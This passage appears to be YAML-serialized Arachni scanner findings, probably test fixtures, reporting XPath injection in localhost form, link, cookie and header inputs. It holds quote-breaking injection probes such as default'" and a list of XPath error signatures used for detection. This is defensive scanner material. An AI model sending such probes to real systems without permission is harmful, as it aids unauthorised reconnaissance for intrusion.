        Content-Type: text/html;charset=utf-8
        Content-Length: "453"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: A closing bracket expected in
    injected: default'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: A closing bracket expected in
      :match: A closing bracket expected in
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: input
      :element: form
      :params: 
        input: default'"
      :follow_location: true
      :injected: default'"
      :combo: 
        input: default'"
      :action: http://localhost:13845/general/form/append
      :verification: false
      :id: A closing bracket expected in
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: A closing bracket expected in
    regexp_match: A closing bracket expected in
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      A closing bracket expected in
      An operand in Union Expression does not produce a node-set
      Cannot convert expression to a number
      Document Axis does not allow any context Location Steps
      Empty Path Expression
      Empty Relative Location Path
      Empty Union Expression
      Expected ')' in
      Expected node test or name specification after axis operator
      Incompatible XPath key
      Incorrect Variable Binding
      A document must contain exactly one root element.
      Expected token ']'

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/general/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: link
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/general/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "453"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: A closing bracket expected in
    injected: default'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: A closing bracket expected in
      :match: A closing bracket expected in
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: input
      :element: link
      :params: 
        input: default'"
      :follow_location: true
      :injected: default'"
      :combo: 
        input: default'"
      :action: http://localhost:13845/general/link/append?input=default
      :verification: false
      :id: A closing bracket expected in
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: A closing bracket expected in
    regexp_match: A closing bracket expected in
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      A closing bracket expected in
      An operand in Union Expression does not produce a node-set
      Cannot convert expression to a number
      Document Axis does not allow any context Location Steps
      Empty Path Expression
      Empty Relative Location Path
      Empty Union Expression
      Expected ')' in
      Expected node test or name specification after axis operator
      Incompatible XPath key
      Incorrect Variable Binding
      A document must contain exactly one root element.
      Expected token ']'

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/general/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: cookie
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/general/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value'"
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "453"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: A closing bracket expected in
    injected: cookie value'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: A closing bracket expected in
      :match: A closing bracket expected in
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value'"
      :injected: cookie value'"
      :combo: 
        cookie2: cookie value'"
      :action: http://localhost:13845/general/cookie/append
      :verification: false
      :id: A closing bracket expected in
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: A closing bracket expected in
    regexp_match: A closing bracket expected in
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      A closing bracket expected in
      An operand in Union Expression does not produce a node-set
      Cannot convert expression to a number
      Document Axis does not allow any context Location Steps
      Empty Path Expression
      Empty Relative Location Path
      Empty Union Expression
      Expected ')' in
      Expected node test or name specification after axis operator
      Incompatible XPath key
      Incorrect Variable Binding
      A document must contain exactly one root element.
      Expected token ']'

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/general/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: header
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/general/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'"
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "453"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: A closing bracket expected in
    injected: arachni_user'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: A closing bracket expected in
      :match: A closing bracket expected in
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'"
      :injected: arachni_user'"
      :combo: 
        User-Agent: arachni_user'"
      :action: http://localhost:13845/general/header/append
      :verification: false
      :id: A closing bracket expected in
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: A closing bracket expected in
    regexp_match: A closing bracket expected in
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      A closing bracket expected in
      An operand in Union Expression does not produce a node-set
      Cannot convert expression to a number
      Document Axis does not allow any context Location Steps
      Empty Path Expression
      Empty Relative Location Path
      Empty Union Expression
      Expected ')' in
      Expected node test or name specification after axis operator
      Incompatible XPath key
      Incorrect Variable Binding
      A document must contain exactly one root element.
      Expected token ']'

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/general/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: form
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/php/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "58"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "xmlXPathEval: evaluation failed"
    injected: default'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "xmlXPathEval: evaluation failed"
      :match: "xmlXPathEval: evaluation failed"
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: input
      :element: form
      :params: 
        input: default'"
      :follow_location: true
      :injected: default'"
      :combo: 
        input: default'"
      :action: http://localhost:13845/php/form/append
      :verification: false
      :id: "xmlXPathEval: evaluation failed"
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: "xmlXPathEval: evaluation failed"
    regexp_match: "xmlXPathEval: evaluation failed"
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      xmlXPathEval: evaluation failed
      SimpleXMLElement::xpath()

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/php/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: link
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/php/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "58"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "xmlXPathEval: evaluation failed"
    injected: default'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "xmlXPathEval: evaluation failed"
      :match: "xmlXPathEval: evaluation failed"
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: input
      :element: link
      :params: 
        input: default'"
      :follow_location: true
      :injected: default'"
      :combo: 
        input: default'"
      :action: http://localhost:13845/php/link/append?input=default
      :verification: false
      :id: "xmlXPathEval: evaluation failed"
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: "xmlXPathEval: evaluation failed"
    regexp_match: "xmlXPathEval: evaluation failed"
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      xmlXPathEval: evaluation failed
      SimpleXMLElement::xpath()

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/php/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: cookie
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/php/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value]]]]]]]]]
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "58"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "xmlXPathEval: evaluation failed"
    injected: cookie value]]]]]]]]]
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "xmlXPathEval: evaluation failed"
      :match: "xmlXPathEval: evaluation failed"
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "]]]]]]]]]"
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value]]]]]]]]]
      :injected: cookie value]]]]]]]]]
      :combo: 
        cookie2: cookie value]]]]]]]]]
      :action: http://localhost:13845/php/cookie/append
      :verification: false
      :id: "xmlXPathEval: evaluation failed"
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: "xmlXPathEval: evaluation failed"
    regexp_match: "xmlXPathEval: evaluation failed"
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      xmlXPathEval: evaluation failed
      SimpleXMLElement::xpath()

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/php/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: header
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/php/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'"
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "58"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "xmlXPathEval: evaluation failed"
    injected: arachni_user'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "xmlXPathEval: evaluation failed"
      :match: "xmlXPathEval: evaluation failed"
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'"
      :injected: arachni_user'"
      :combo: 
        User-Agent: arachni_user'"
      :action: http://localhost:13845/php/header/append
      :verification: false
      :id: "xmlXPathEval: evaluation failed"
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: "xmlXPathEval: evaluation failed"
    regexp_match: "xmlXPathEval: evaluation failed"
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      xmlXPathEval: evaluation failed
      SimpleXMLElement::xpath()

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/php/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: form
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/java/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "61"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: XPathException
    injected: default'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: XPathException
      :match: XPathException
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: input
      :element: form
      :params: 
        input: default'"
      :follow_location: true
      :injected: default'"
      :combo: 
        input: default'"
      :action: http://localhost:13845/java/form/append
      :verification: false
      :id: XPathException
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: XPathException
    regexp_match: XPathException
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      XPathException
      Unknown error in XPath
      org.apache.xpath.XPath

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/java/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: link
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/java/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "61"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: XPathException
    injected: default'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: XPathException
      :match: XPathException
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: input
      :element: link
      :params: 
        input: default'"
      :follow_location: true
      :injected: default'"
      :combo: 
        input: default'"
      :action: http://localhost:13845/java/link/append?input=default
      :verification: false
      :id: XPathException
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: XPathException
    regexp_match: XPathException
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      XPathException
      Unknown error in XPath
      org.apache.xpath.XPath

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/java/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: cookie
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/java/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value'"
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "61"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: XPathException
    injected: cookie value'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: XPathException
      :match: XPathException
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
